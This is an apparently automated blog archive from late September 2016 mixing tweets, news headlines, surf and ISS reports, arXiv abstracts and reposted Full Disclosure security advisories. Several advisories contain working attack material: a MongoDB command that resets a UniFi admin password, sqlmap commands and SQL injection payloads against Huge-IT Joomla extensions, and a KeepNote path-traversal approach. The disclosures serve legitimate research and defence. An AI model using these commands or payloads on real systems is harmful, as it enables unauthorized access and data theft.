
Saturday, October 1, 2016

I have a new follower on Twitter


Allocadia
Allocadia Marketing Performance Management is planning, budgeting, and analysis software built for revenue-driven marketing teams.
Vancouver, BC
http://t.co/rgiCaQSnkx
Following: 9902 - Followers: 9985

October 01, 2016 at 11:34PM via Twitter http://twitter.com/allocadia

United States set to Hand Over Control of the Internet to ICANN Today

Since the foundation of the Internet, a contract has been handed over to the United States Commerce Department under which the department had given authority to regulate the Internet. After 47 years, this contract ends tonight at midnight EDT i.e. Saturday, October 1st, 2016. If you think that the United States owns the Internet, then you're wrong. It doesn't. Founded in 1998, non-profit


from The Hacker News http://ift.tt/2dtzwWs
via IFTTT

An open letter to Sean Anonymous

Dear Sean Anonymous, It's me, Mina Moore: your friend and Local Current Resident DJ predecessor! You've by now accepted your invitation to host ...

from Google Alert - anonymous http://ift.tt/2dg9gku
via IFTTT

The Weeknd

Commercials · Film & TV · Management · About · Contact · News. Grant Singer. The Weeknd “Starboy”. Search. Videos. No results found. News.

from Google Alert - anonymous http://ift.tt/2dknLiW
via IFTTT

Anonymous user 6b676b

Name, Anonymous user 6b676b. User since, July 5, 2016. Number of add-ons developed, 0 add-ons. Average rating of developer's add-ons, Not yet ...

from Google Alert - anonymous http://ift.tt/2dOo8oE
via IFTTT

Anonymous

... Year Entering College: 0; State of Residence: 0. Academic Background. Selectivity Index™: 46. Anonymous has not listed any extracurriculars.

from Google Alert - anonymous http://ift.tt/2cInzfX
via IFTTT

Uh oh, Yahoo! Data Breach May Have Hit Over 1 Billion Users

The massive data breach that Yahoo! confirmed to the world last week is claimed by the company to have been carried out by a "state-sponsored actor" in 2014, which exposed the accounts of at least 500 Million Yahoo users. But, now it seems that Yahoo has downplayed a mega data breach and is trying to hide its own security blunder. Recently the information security firm InfoArmor that analyzed


from The Hacker News http://ift.tt/2dfdXLg
via IFTTT

Ocean City, MD's surf is at least 8.6ft high

Maryland-Delaware, October 07, 2016 at 04:00AM

Ocean City, MD Summary
At 4:00 AM, surf min of 8.6ft. At 10:00 AM, surf min of 8.43ft. At 4:00 PM, surf min of 7.94ft. At 10:00 PM, surf min of 8.21ft.

Surf maximum: 9.61ft (2.93m)
Surf minimum: 8.6ft (2.62m)
Tide height: 1.47ft (0.45m)
Wind direction: ENE
Wind speed: 22.96 KTS


from Surfline http://ift.tt/1kVmigH
via IFTTT

Friday, September 30, 2016

Orioles move 1 game ahead of the Blue Jays for the top AL wild-card spot after 8-1 win over the Yankees (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

I have a new follower on Twitter


John Moss
Managed Services Provider offering #premier #technology products and services. We help your #business systems run faster and provide support when you need us.
ÜT: 33.859755,-83.985618
https://t.co/UZxfgyPgva
Following: 573 - Followers: 634

September 30, 2016 at 08:49PM via Twitter http://twitter.com/ilovemycomputer

via Instagram http://ift.tt/2dryKJn

[FD] CompTIA Security+ and its insecure support system

I signed up for a CompTIA account with a fake name for privacy reasons. Later on, I wanted to update my name in the CompTIA account because I was planning to take their Security+ certificate. The problem is I cannot update my name directly from the profile menu; it told me to create a support ticket (this is a good idea I guess). However, the support guy asked me to upload a copy of a legal ID (driver's license or passport) to the support ticket system.

The real bad thing is that CompTIA's support ticket system can be logged in to using just an "email address". If you know the email of someone who holds a CompTIA certificate, you can freely access his/her support tickets at: http://ift.tt/2cRyfr0 You can fill anything in the 'first name' field. Only a valid email address is required to access anybody's support ticket.

So I tried to explain to them that it is not a good security practice to ask me to upload my passport to such an insecure system, but the support guy cannot do anything about it. I think the Security+ certificate creators need to learn how to secure a system containing sensitive information like copies of customers' passports with at least a pair of username and password.

rgds,
CISSP wannabe

Source: Gmail -> IFTTT-> Blogger

[FD] Critical Vulnerability in Ubiquiti UniFi

Hello @all,

together with my colleague we found two uncritical vulnerabilities you'll find below.

Product: UniFi AP AC Lite
Vendor: Ubiquiti Networks Inc.
Internal reference: ? (Bug ID)
Vulnerability type: Incorrect access control
Vulnerable version: Unify 5.2.7 and possible other versions affected (not tested)
Vulnerable component: Database
Report confidence: yes
Solution status: Not fixed by Vendor, the bug is a feature.
Fixed versions: -
Researcher credits: Tim Schughart, Immanuel Bär, Khanh Quoc Pham of ProSec Networks
Solution date: -
Public disclosure: 2016-09-30
CVE reference: CVE-2016-7792
CVSSv3: 8.8 AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Vulnerability Details:
You are able to connect to the access point's database because of a broken authentication (OWASP TOP10). So you are able to modify the database and read the data. A possible scenario you'll find in the PoC section.

Risk:
An attacker gets access to the database and, e.g., is able to change the admin's password, like you see in the PoC below.

PoC:
1. Generate SHA512 Hash with e.g. mkpasswd -m sha-512
2. Connect via network to database, e.g.: mongo --port 27117 --host target_ip
3. Change password via command "db.admin.update({"name":"ProSec"}, {$set : {"x_shadow": "$6$Se9i5I7k3hI8d4bk$CqEXRUwk7c7A/62E/HcC4SrMSLOrBdm7wRvwTS4t.nNJA3RYta0RfzJpuREg.qcAHsPGW9Gjwm3krJROXzbCv."}})"
4. Login via web interface with new password

Best regards / Mit freundlichen Grüßen
Tim Schughart
CEO / Geschäftsführer

Source: Gmail -> IFTTT-> Blogger

[FD] Multiple exposures in Sophos UTM

Hello @all,

together with my colleague we found two uncritical vulnerabilities you'll find below.

Product: Sophos UTM
Vendor: Sophos ltd.
Internal reference: ? (Bug ID)
Vulnerability type: Information Disclosure
Vulnerable version: 9.405-5, 9.404-5 and possible other versions affected (not tested)
Vulnerable component: Frontend
Report confidence: yes
Solution status: Not fixed by Vendor, no further responses from vendor.
Fixed versions: -
Researcher credits: Tim Schughart & Khanh Quoc Pham of ProSec Networks
Vendor notification: 2016-09-01
Solution date: -
Public disclosure: 2016-09-30
CVE reference: CVE-2016-7397
CVSSv3: 6.7 AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:L/A:N

Report timeline:
2016-09-01: Contacted Vendor, vendor acknowledged, no further response
2016-09-12: Contacted Vendor again, started to fix
2016-09-30: Contacted Vendor again, because there has been no response to our request and our initially stated disclosure date, no response again.
2016-09-30: Public Disclosure.

Vulnerability Details:
The password is reflected to the DOM and is readable through the "value" field of the SMTP user settings in the notifications tab. You have to be authenticated to access the configuration tab.

Risk:
An attacker gets access to the configured mailbox. Because Sophos UTM is a multi-user system, this is a problem in bigger company environments with split admin rights. The surface scope is changed, because in bigger environments you are getting access to the configured mailbox, which results in an integrity loss.

Steps to reproduce:
See vulnerability details.

Source: Gmail -> IFTTT-> Blogger

[FD] Radioactive Mouse States the Obvious: Exploiting unencrypted and unauthenticated data communication of wireless mice

tl;dr Today, SySS published a proof-of-concept video demonstrating a mouse spoofing attack resulting in remote code execution due to insecure wireless mouse communication: https://www.youtube.com/watch?v=PkR8EODee44 --

Source: Gmail -> IFTTT-> Blogger

[FD] [SYSS-2016-061] PERIDUO-710W - Insufficient Verification of Data Authenticity (CWE-345)


Source: Gmail -> IFTTT-> Blogger

[FD] [SYSS-2016-060] Logitech M520 - Insufficient Verification of Data Authenticity (CWE-345)


Source: Gmail -> IFTTT-> Blogger

[FD] [SYSS-2016-058] CHERRY B.UNLIMITED AES - Insufficient Verification of Data Authenticity (CWE-345)


Source: Gmail -> IFTTT-> Blogger

[FD] Unauthenticated SQL Injection in Huge-IT Portfolio Gallery Plugin v1.0.6

Title: Unauthenticated SQL Injection in Huge-IT Portfolio Gallery Plugin v1.0.6
Author: Larry W. Cashdollar, @_larry0
Date: 2016-09-16
Download Site: http://ift.tt/2aFCmny
Vendor: huge-it.com
Vendor Notified: 2016-09-17
Vendor Contact: info@huge-it.com

Description: Huge-IT Portfolio Gallery extension can do wonders with your website. If you wish to show your photos, videos, enclosing the additional images and videos, then this Portfolio Gallery extension is what you need.

Vulnerability: The following lines allow unauthenticated users to perform SQL injection against the functions in ajax_url.php:

In file ajax_url.php:

    define('_JEXEC',1);
    defined('_JEXEC') or die('Restircted access');
    . . .
    $page = $_POST["page"];
    $num=$_POST['perpage'];
    $start = $page * $num - $num;
    $idofgallery=$_POST['galleryid'];
    $level = $_POST['level'];
    $query = $db->getQuery(true);
    $query->select('*');
    $query->from('#__huge_itportfolio_images');
    $query->where('portfolio_id ='.$idofgallery);
    $query ->order('#__huge_itportfolio_images.ordering asc');
    $db->setQuery($query,$start,$num);

CVE-2016-1000124

Exploit Code:

    $ sqlmap -u 'http://ift.tt/2cHwqcZ' --data="page=1&galleryid=*&post=huge_it_portfolio_gallery_ajax&perpage=20&linkbutton=2" --level=5 --risk=3

    (custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
    sqlmap identified the following injection point(s) with a total of 2870 HTTP(s) requests:

Source: Gmail -> IFTTT-> Blogger

via Instagram http://ift.tt/2d20GQW

Orioles Poll: Who's been the team MVP in 2016: Zach Britton, Kevin Gausman, Manny Machado or Mark Trumbo? Vote now! (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

ISS Daily Summary Report – 09/29/2016

Group Combustion Module (GCM) Installation: FE-5 continued with the third day of installation and preparation for the GCM experiment and was to perform two pressure decay leak checks. After the first check, a leak was detected in the Air/O2 line, thus aborting the second check until specialist can determine the cause and develop a solution. The Elucidation of Flame Spread and Group Combustion Excitation Mechanism of Randomly-distributed Droplet Clouds (Group Combustion) investigation by the Japan Aerospace Exploration Agency (JAXA) tests a theory that fuel sprays change from partial to group combustion as flames spread across a cloud of droplets. In the Multi-Purpose Small Payload Rack (MSPR) in the Kibo module, droplets of decane, a component of gasoline or kerosene, are arranged randomly on thin-fiber lattice points, and the flame and droplet positions and temperature distribution are measured as the flame spreads. Microgravity blocks convection, which on Earth would quickly disperse the droplets and combustion products before such measurements could be made.  Bigelow Expandable Activity Module (BEAM): FE-6 ingressed BEAM and temporarily installed the Internal Wireless Instrumentation System (IWIS) Remote Sensing Unit (RSU) in Node 3 and the Triaxial Accelerometer (TAA) in BEAM. Following the instrument installation, FE-6 performed a modal test by imparting loads onto BEAM and measuring the acceleration throughout the module. Expandable habitats, occasionally described as inflatable habitats, greatly decrease the amount of transport volume for future space missions. These “expandables” weigh less and take up less room on a rocket while allowing additional space for living and working. They also provide protection from solar and cosmic radiation, space debris, and other contaminants. 
Crews traveling to the moon, Mars, asteroids, or other destinations could potentially use them as habitable structures ENERGY (Astronaut’s Energy Requirement for Long-Term Space Flight: FE-5 began the first day of the 11 day ENERGY experiment. Intended to measure an Astronaut’s Energy Requirements, ENERGY will require FE-5 to consume standardized meals today and tomorrow, in addition to diet logging over the entire 11 day duration. Today FE-5 also setup the Armband Activity Monitor which will be worn through the duration of the experiment, took water samples, and setup the oxygen uptake measurements (XTP). Energy investigation measures an Astronaut’s Energy Requirements for Long-Term Space Flight, a crucial factor needed for sending the correct amount of the right types of food with space crews. Astronauts often lose body mass with extended stays in space for reasons that remain unclear, although increased exercise as a microgravity countermeasure may be a factor. Knowing details of astronaut metabolism and activity, combined with other conditions, will help ensure that crews are properly nourished on long missions.  Today’s Planned Activities All activities are on schedule unless otherwise noted. Personal CO2 Monitor iPad Application Restart Soyuz 731 Descent Procedure Update Preparation of Reports for Roscosmos Web Site and Social Media URAGAN. Observation and photography RS Photo Cameras Sync Up to Station Time EKON-M. 
Observations and photography Multi-purpose Small Payload Rack (MSPR) Combustion Chamber (CC) Leak Check 1 [Cancelled] Fine Motor Skills Experiment Test – Subject Replacement ПУ-1 in АСУ Hard To Wet Sample Module Inspection Food Frequency Questionnaire (FFQ) Water Recovery System Waste Water Tank Drain Init Advanced Resistive Exercise Device (ARED) Cylinder Flywheel Evacuation Mating New Control Panel Telemetry Cable to БИТС2-12 Group Combustion Module (GCM) Experiment Laptop Terminal 2 (ELT2)  Setup Replacement ПУ-1 Control Panel in [АСУ] Water Recovery System Waste Water Tank Drain Termination MRM2 comm config to support the P/L Ops Kulonovskiy Kristall Experiment Run MRM2 Comm Reconfig for Nominal Ops KULONOVSKIY KRISTALL Habitability Human Factors Questionnaires – Subject Habitability Human Factors Directed Observations – Subject Regenerative Environmental Control and Life Support System (RGN) WSTA Fill Remove Items in Front of N3A for Hatch Access Photo/TV N3/BEAM Camcorder Setup ARED Platform Fold Food Frequency Questionnaire (FFQ) BEAM Ingress Air sampling in BEAM module using AK-1M sampler before air duct installation Multi-purpose Small Payload Rack (MSPR) Combustion Chamber (CC) Leak Check 2 Replacement of CO2 Filter Unit ИК0501 Personal CO2 Monitor Power Cycle TAA Install in BEAM СОЖ maintenance Tape Distributed Impact Detection System (DIDS) sensors Modal Test Armband Activity Monitor Setup Progress 432 [OA] Stowage Ops with IMS Support ENERGY Water Sample Multi-purpose Small Payload Rack (MSPR) Combustion Chamber (CC) pressure gauge check and Valve Operations. PAO Preparation Public Affairs Office (PAO) High Definition (HD) Config LAB Setup Energy PFS Setup Public Affairs Office (PAO) Event in High Definition (HD) – Lab Deconfigure IWIS DDS Data Download to BEAM SSC OTKLIK. 
Hardware Monitoring BEAM Cleanup and Egress Regenerative Environmental Control and Life Support System (RGN) WSTA Fill Return Items Back to N3A Location That Were Removed for BEAM Ingress ARED Platform Unfold Back to Nominal Position Ghost Camera Stow INTERACTION-2. Experiment Ops Inventory Management System (IMS) Conference Multi-purpose Small Payload Rack (MSPR) Combustion Chamber (CC) pressure gauge check and Valve Operations. CB/ISS CREW CONFERENCE Flight Director/ISS CREW CONFERENCE Crew Choice Event Personal CO2 Monitor Power Cycle Personal CO2 Monitor Doff and Charge Completed Task List Items None  Ground Activities All activities are on schedule unless otherwise noted. Lab MCA Zero Calibration [Delayed] Three-Day Look Ahead: Friday, 09/30: Energy Experiment, PGT TAK Data Gather Saturday, 10/01: Finemotor Skills, Hard to Wet Surfaces, Energy Conclude Sunday, 10/02: Crew Off Duty QUICK ISS Status – Environmental Control Group:                               Component Status Elektron On Vozdukh Manual [СКВ] 1 – SM Air Conditioner System (“SKV1”) On [СКВ] 2 – SM Air Conditioner System (“SKV2”) Off Carbon Dioxide Removal Assembly (CDRA) Lab Standby Carbon Dioxide Removal Assembly (CDRA) Node 3 Operate Major Constituent Analyzer (MCA) Lab Standby Major Constituent Analyzer (MCA) Node 3 Operate Oxygen Generation Assembly (OGA) Process Urine Processing Assembly (UPA) Reprocess Trace Contaminant Control System (TCCS) Lab Off Trace Contaminant Control System (TCCS) Node 3 Full Up  

from ISS On-Orbit Status Report http://ift.tt/2dwPZei
via IFTTT

Ocean City, MD's surf is at least 13.04ft high

Maryland-Delaware, October 06, 2016 at 04:00AM

Ocean City, MD Summary
At 4:00 AM, surf min of 13.04ft. At 10:00 AM, surf min of 12.73ft. At 4:00 PM, surf min of 12.86ft. At 10:00 PM, surf min of 11.63ft.

Surf maximum: 14.05ft (4.28m)
Surf minimum: 13.04ft (3.97m)
Tide height: 1.06ft (0.32m)
Wind direction: ENE
Wind speed: 36.76 KTS


from Surfline http://ift.tt/1kVmigH
via IFTTT

Zerodium Offers $1.5 Million Bounty For iOS Zero-Day Exploits

Well, there's some good news for Hackers and Bug hunters, though terrible news for Apple! Exploit vendor Zerodium has tripled its bug bounty for an Apple iOS 10 zero-day exploit, offering a maximum payout of $US1.5 Million. Yes, $1,500,000.00 Reward. That's more than seven times what Apple is offering (up to $200,000) for iOS zero-days via its private, invite-only bug bounty program.


from The Hacker News http://ift.tt/2drz0ED
via IFTTT

Thursday, September 29, 2016

I have a new follower on Twitter


Medical Innovation
Celebrating and promoting the promise of medical research and innovation. Principal contributor: Chris Ward
U.S.A.
https://t.co/vnoTXKK4Az
Following: 1669 - Followers: 3524

September 29, 2016 at 10:49PM via Twitter http://twitter.com/Med_Innovation

I have a new follower on Twitter


BlueBolt, Inc.
A digital agency in Chicago & Denver providing consulting services in #CRM, #Search, #Cybersecurity, #PIM, & #MarketingAutomation
Chicago, Il
http://t.co/Qo15LlPwEL
Following: 1134 - Followers: 1157

September 29, 2016 at 10:09PM via Twitter http://twitter.com/BlueBoltSol

Orioles (87-72) tie Blue Jays (87-72) for top wild card spot after 4-0 win; Ubaldo Jimenez 6.2 IP, 1 H and 5 K (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

ICE: Information Credibility Evaluation on Social Media via Representation Learning. (arXiv:1609.09226v1 [cs.SI])

With the rapid growth of social media, rumors are also spreading widely on social media and bring harm to people's daily life. Nowadays, information credibility evaluation has drawn attention from academic and industrial communities. Current methods mainly focus on feature engineering and achieve some success. However, feature engineering based methods require a lot of labor and cannot fully reveal the underlying relations among data. In our viewpoint, the key elements of user behaviors for evaluating credibility are concluded as "who", "what", "when", and "how". These existing methods cannot model the correlation among different key elements during the spreading of microblogs. In this paper, we propose a novel representation learning method, Information Credibility Evaluation (ICE), to learn representations of information credibility on social media. In ICE, latent representations are learnt for modeling user credibility, behavior types, temporal properties, and comment attitudes. The aggregation of these factors in the microblog spreading process yields the representation of a user's behavior, and the aggregation of these dynamic representations generates the credibility representation of an event spreading on social media. Moreover, a pairwise learning method is applied to maximize the credibility difference between rumors and non-rumors. To evaluate the performance of ICE, we conduct experiments on a Sina Weibo data set, and the experimental results show that our ICE model outperforms the state-of-the-art methods.



from cs.AI updates on arXiv.org http://ift.tt/2ddU7h9
via IFTTT

Heuristic with elements of tabu search for Truck and Trailer Routing Problem. (arXiv:1609.09253v1 [cs.AI])

Vehicle Routing Problem is a well-known problem in logistics and transportation, and the variety of such problems is explained by the fact that it occurs in many real-life situations. It is an NP-hard combinatorial optimization problem and finding an exact optimal solution is practically impossible. In this work, Site-Dependent Truck and Trailer Routing Problem with hard and soft Time Windows and Split Deliveries is considered (SDTTRPTWSD). In this article, we develop a heuristic with the elements of Tabu Search for solving SDTTRPTWSD. The heuristic uses the concept of neighborhoods and visits infeasible solutions during the search. A greedy heuristic is applied to construct an initial solution.



from cs.AI updates on arXiv.org http://ift.tt/2ddTvYw
via IFTTT

Semantic Parsing with Semi-Supervised Sequential Autoencoders. (arXiv:1609.09315v1 [cs.CL])

We present a novel semi-supervised approach for sequence transduction and apply it to semantic parsing. The unsupervised component is based on a generative model in which latent sentences generate the unpaired logical forms. We apply this method to a number of semantic parsing tasks focusing on domains with limited access to labelled training data and extend those datasets with synthetically generated logical forms.



from cs.AI updates on arXiv.org http://ift.tt/2ddUkRm
via IFTTT

Deep Tracking on the Move: Learning to Track the World from a Moving Vehicle using Recurrent Neural Networks. (arXiv:1609.09365v1 [cs.CV])

This paper presents an end-to-end approach for tracking static and dynamic objects for an autonomous vehicle driving through crowded urban environments. Unlike traditional approaches to tracking, this method is learned end-to-end, and is able to directly predict a full unoccluded occupancy grid map from raw laser input data. Inspired by the recently presented DeepTracking approach [Ondruska, 2016], we employ a recurrent neural network (RNN) to capture the temporal evolution of the state of the environment, and propose to use Spatial Transformer modules to exploit estimates of the egomotion of the vehicle. Our results demonstrate the ability to track a range of objects, including cars, buses, pedestrians, and cyclists through occlusion, from both moving and stationary platforms, using a single learned model. Experimental results demonstrate that the model can also predict the future states of objects from current inputs, with greater accuracy than previous work.



from cs.AI updates on arXiv.org http://ift.tt/2ddU3xC
via IFTTT

Evaluating Induced CCG Parsers on Grounded Semantic Parsing. (arXiv:1609.09405v1 [cs.CL])

We compare the effectiveness of four different syntactic CCG parsers for a semantic slot-filling task to explore how much syntactic supervision is required for downstream semantic analysis. This extrinsic, task-based evaluation also provides a unique window into the semantics captured (or missed) by unsupervised grammar induction systems.



from cs.AI updates on arXiv.org http://ift.tt/2dDK0QD
via IFTTT

Contextual RNN-GANs for Abstract Reasoning Diagram Generation. (arXiv:1609.09444v1 [cs.CV])

Understanding, predicting, and generating object motions and transformations is a core problem in artificial intelligence. Modeling sequences of evolving images may provide better representations and models of motion and may ultimately be used for forecasting, simulation, or video generation. Diagrammatic Abstract Reasoning is an avenue in which diagrams evolve in complex patterns and one needs to infer the underlying pattern sequence and generate the next image in the sequence. For this, we develop a novel Contextual Generative Adversarial Network based on Recurrent Neural Networks (Context-RNN-GANs), where both the generator and the discriminator modules are based on contextual history (modeled as RNNs) and the adversarial discriminator guides the generator to produce realistic images for the particular time step in the image sequence. We evaluate the Context-RNN-GAN model (and its variants) on a novel dataset of Diagrammatic Abstract Reasoning, where it performs competitively with 10th-grade human performance but there is still scope for interesting improvements as compared to college-grade human performance. We also evaluate our model on a standard video next-frame prediction task, achieving improved performance over comparable state-of-the-art.



from cs.AI updates on arXiv.org http://ift.tt/2dDIEW0
via IFTTT

[FD] Persistent XSS in Abus Security Center - CVSS 8.0

[FD] KeepNote 0.7.8 Remote Command Execution

# Title : KeepNote 0.7.8 Remote Command Execution
# Date : 29/09/2016
# Author : R-73eN
# Twitter : https://twitter.com/r_73en
# Tested on : KeepNote 0.7.8 (Kali Linux, and Windows 7)
# Software : http://ift.tt/2dv14fQ
# Vendor : ~
#
# DESCRIPTION:
#
# When KeepNote imports a backup, which is actually a tar.gz file, it doesn't check for " ../ " characters,
# which makes it possible to do a path traversal and write anywhere in the system (where the user has writing permissions).
# This simple POC will write to the /home/root/.bashrc the file test.txt to get command execution when the bash is run.
# There are a lot of ways but I chose this just for demonstration purposes and it's supposed we run the keepnote application
# as root (default in Kali Linux, on which this bug is tested).
#
#

Source: Gmail -> IFTTT-> Blogger

Associate anonymous orders to new accounts via email

While accounts can be created from anonymous order checkouts (in the last step of checkout), I propose anonymous orders should be associated to ...

from Google Alert - anonymous http://ift.tt/2duIYuf
via IFTTT

37-Year-Old 'Syrian Electronic Army' Hacker Pleads Guilty in US court

One of the FBI's Most Wanted Hackers who was arrested in Germany earlier this year has pleaded guilty to federal charges for his role in a scheme that hacked computers and targeted the US government, foreign governments, and multiple US media outlets. Peter Romar, 37, pleaded guilty Wednesday in a federal court in Alexandria to felony charges of conspiring to receive extortion proceeds and to


from The Hacker News http://ift.tt/2dpt7YA
via IFTTT

ISS Daily Summary Report – 09/28/2016

Marangoni Experiment (Dynamic Surf 3): Overnight another run of the Marangoni experiment occurred in the Fluid Physics Experiment Facility (FPEF). The Dynamic Surf investigation is part of a series of JAXA experiments studying Marangoni convection driven by the presence of surface tension gradients produced by a temperature difference at a liquid/gas interface. By observing and understanding how a silicone oil liquid bridge moves, researchers can learn about how heat is transferred in microgravity and ultimately drive the design and development of more efficient fluid flow based systems and devices.  Hard to Wet Surfaces: FE-6 performed the sample processing, setup of the Sample Module, and initiated automated photography of the samples. Throughout the day, FE-5 and FE-6 periodically remixed the samples before finally downlinking the day’s photographs and stowing the experiment. The Hard to Wet Surfaces (Eli Lilly-Hard to Wet Surfaces) investigation studies how certain materials used in the pharmaceutical industry dissolve in water while in microgravity. Results from this investigation could help improve the design of tablets that dissolve in the body to deliver drugs, thereby improving drug design for medicines used in space and on Earth. Group Combustion Module (GCM) Installation: Today, FE-5 continued with day 2 of installation and preparation for the GCM experiment. FE-5 installed the Combustion Chamber (CC) that the crew assembled yesterday and the Gas Bottle Unit (GBU) Air into the Multi-Purpose Small Payload Rack (MSPR) Work Volume. The Elucidation of Flame Spread and Group Combustion Excitation Mechanism of Randomly-distributed Droplet Clouds (Group Combustion) investigation by the Japan Aerospace Exploration Agency (JAXA) tests a theory that fuel sprays change from partial to group combustion as flames spread across a cloud of droplets. 
In the Multi-Purpose Small Payload Rack (MSPR) in the Kibo module, droplets of decane, a component of gasoline or kerosene, are arranged randomly on thin-fiber lattice points, and the flame and droplet positions and temperature distribution are measured as the flame spreads. Microgravity blocks convection, which on Earth would quickly disperse the droplets and combustion products before such measurements could be made. Sound Level Meter (SLM) Survey:  Today FE-6 performed SLM acoustic measurements. The Node 3 diagnostic SLM survey plan called for eight sets of measurements, encompassing various Node 3 Common Cabin Air Assembly (CCAA) fan speeds and Rheostat Air Mix Valve (RAMV) settings with the Urine Processor Assembly (UPA) Distillation Assembly (DA) and Oxygen Generation Assembly (OGA) Pump either on or off depending on the portion of the survey plan being worked, totaling 52 SLM measurements.  In addition, standard SLM measurements of the US Lab and Service Module (SM) were taken.   Today’s Planned Activities All activities were completed unless otherwise noted. Fine Motor Skills Experiment Test – Subject Hard To Wet Surfaces Sample Processing Э-NOC. Execution experiment Multi Omics FOS Stow Hard To Wet Surfaces D2Xs Battery Charge Multi Omics FOS Preparation Ghost Camera Setup for Modal Test Hard To Wet Surfaces Sample Remix. Sound Level Meter (SLM) Setup and Operations Hard To Wet Surfaces Sample Remix. 
ENERGY Big Picture Words Reading  ENERGY Equipment Pre-gather Strata Card Changeout Hard To Wet Surfaces Sample Remix Sound Level Meter (SLM) Data Transfer ISS air pressurization from ТГК Dose Tracker Data Entry Subject Personal CO2 Monitor Power Cycle Public Affairs Office (PAO) High Definition (HD) Config LAB Setup Total Organic Carbon Analyzer (TOCA) Water Recovery System (WRS) Sample Analysis Greetings Video Recording XF305 Camcorder Setup Multi-purpose Small Payload Rack (MSPR) Combustion Chamber (CC) Install Public Affairs Office (PAO) Event in High Definition (HD) – Lab Modal Test Hardware Unstow Air Heater Fan [БВН]  64P PROGRESS checkout IWIS Install for Modal Test Group Combustion Module (GCM) Gas Bottle Unit Air (GBU) Install СОЖ maintenance Total Organic Carbon Analyzer (TOCA) Sample Data Record HARD TO WET SURFACES CAMERA RESTART Completed Task List Items JAXA Report Part 6 (Active) Ground Activities All activities were completed unless otherwise noted. N3 system reconfigurations for SLM measurements RPCM AL1A4A_B and LAD62B_A Firmware Update Three-Day Look Ahead: Thursday, 09/29: BEAM Ingress and Modal Test, Energy setup Friday, 09/30: Energy Experiment, PGT TAK Data Gather Saturday, 10/01: Finemotor Skills, Hard to Wet Surfaces, Energy Conclude  QUICK ISS Status – Environmental Control Group:                               Component Status Elektron On Vozdukh Manual [СКВ] 1 – SM Air Conditioner System (“SKV1”) On [СКВ] 2 – SM Air Conditioner System (“SKV2”) Off Carbon Dioxide Removal Assembly (CDRA) Lab Standby Carbon Dioxide Removal Assembly (CDRA) Node 3 Operate Major Constituent Analyzer (MCA) Lab Operate Major Constituent Analyzer (MCA) Node 3 Operate Oxygen Generation Assembly (OGA) Process Urine Processing Assembly (UPA) Reprocess Trace Contaminant Control System (TCCS) Lab Off Trace Contaminant Control System (TCCS) Node 3 Full Up

from ISS On-Orbit Status Report http://ift.tt/2cEfJ6U
via IFTTT

Multiple Backdoors found in D-Link DWR-932 B LTE Router

If you own a D-Link wireless router, especially DWR-932 B LTE router, you should get rid of it, rather than wait for a firmware upgrade that never lands soon. D-Link DWR-932B LTE router is allegedly vulnerable to over 20 issues, including backdoor accounts, default credentials, leaky credentials, firmware upgrade vulnerabilities and insecure UPnP (Universal Plug-and-Play) configuration. If


from The Hacker News http://ift.tt/2dtzNKK
via IFTTT

Improve Your Online Privacy And Security Using NordVPN

Today, most users surf the web unaware of the fact that websites collect their data and track their locations – and if this is not enough, then there are hackers and cyber criminals who can easily steal sensitive data from the ill-equipped. In short, the simple truth is that you have no or very little privacy when you're online. So, if you're worried about identity thieves, or ISPs spying on


from The Hacker News http://ift.tt/2dcV4o6
via IFTTT

Ocean City, MD's surf is at least 7.9ft high

Maryland-Delaware, October 05, 2016 at 04:00AM

Ocean City, MD Summary
At 4:00 AM, surf min of 7.9ft. At 10:00 AM, surf min of 9.73ft. At 4:00 PM, surf min of 10.92ft. At 10:00 PM, surf min of 11.68ft.

Surf maximum: 8.74ft (2.67m)
Surf minimum: 7.9ft (2.41m)
Tide height: 0.67ft (0.2m)
Wind direction: ENE
Wind speed: 26.3 KTS


from Surfline http://ift.tt/1kVmigH
via IFTTT

[FD] Unauthenticated SQL Injection in Huge-IT Catalog v1.0.7 for Joomla

Title: Unauthenticated SQL Injection in Huge-IT Catalog v1.0.7 for Joomla
Author: Larry W. Cashdollar, @_larry0
Date: 2016-09-16
Download Site: http://ift.tt/2cy5GyY
Vendor: huge-it.com
Vendor Notified: 2016-09-17
Vendor Contact: info@huge-it.com

Description: Huge-IT Product Catalog is made for demonstration, sale, advertisements for your products. Imagine a stand with a variety of catalogs with a specific product category. To imagine is not difficult, to use is even easier.

Vulnerability: The following code does not prevent an unauthenticated user from injecting SQL into functions via 'load_more_elements_into_catalog' located in ajax_url.php.

Vulnerable Code in: ajax_url.php

    define('_JEXEC', 1);
    defined('_JEXEC') or die('Restircted access');
    . . .
    } elseif ($_POST["post"] == "load_more_elements_into_catalog") {
        $catalog_id = $_POST["catalog_id"];
        $old_count = $_POST["old_count"];
        $count_into_page = $_POST["count_into_page"];
        $show_thumbs = $_POST["show_thumbs"];
        $show_description = $_POST["show_description"];
        $show_linkbutton = $_POST["show_linkbutton"];
        $parmalink = $_POST["parmalink"];
        $level = $_POST['level'];
        . . .
        $query->select('*');
        $query->from('#__huge_it_catalog_products');
        $query->where('catalog_id =' . $catalog_id);
        $query->order('ordering asc');
        $db->setQuery($query, $from, $count_into_page);

CVE-2016-1000125

Exploit Code:

    $ sqlmap -u 'http://ift.tt/2cMQiib' --data="prod_page=1&post=load_more_elements_into_catalog&catalog_id=*&old_count=*&count_into_page=*&show_thumbs=*&show_description=*&parmalink=*" --level=5 --risk=3

    Parameter: #1* ((custom) POST)
    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
    Payload: prod_page=1&post=load_more_elements_into_catalog&catalog_id=-2369 OR 1 GROUP BY CONCAT(0x717a627871,(SELECT (CASE WHEN (1973=1973) THEN 1 ELSE 0 END)),0x716b787671,FLOOR(RAND(0)*2)) HAVING MIN(0)#&old_count=&count_into_page=&show_thumbs=&show_description=&parmalink=

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace
    Payload: prod_page=1&post=load_more_elements_into_catalog&catalog_id=(CASE WHEN (7371=7371) THEN SLEEP(5) ELSE 7371 END)&old_count=&count_into_page=&show_thumbs=&show_description=&parmalink=

    Type: UNION query
    Title: Generic UNION query (random number) - 15 columns
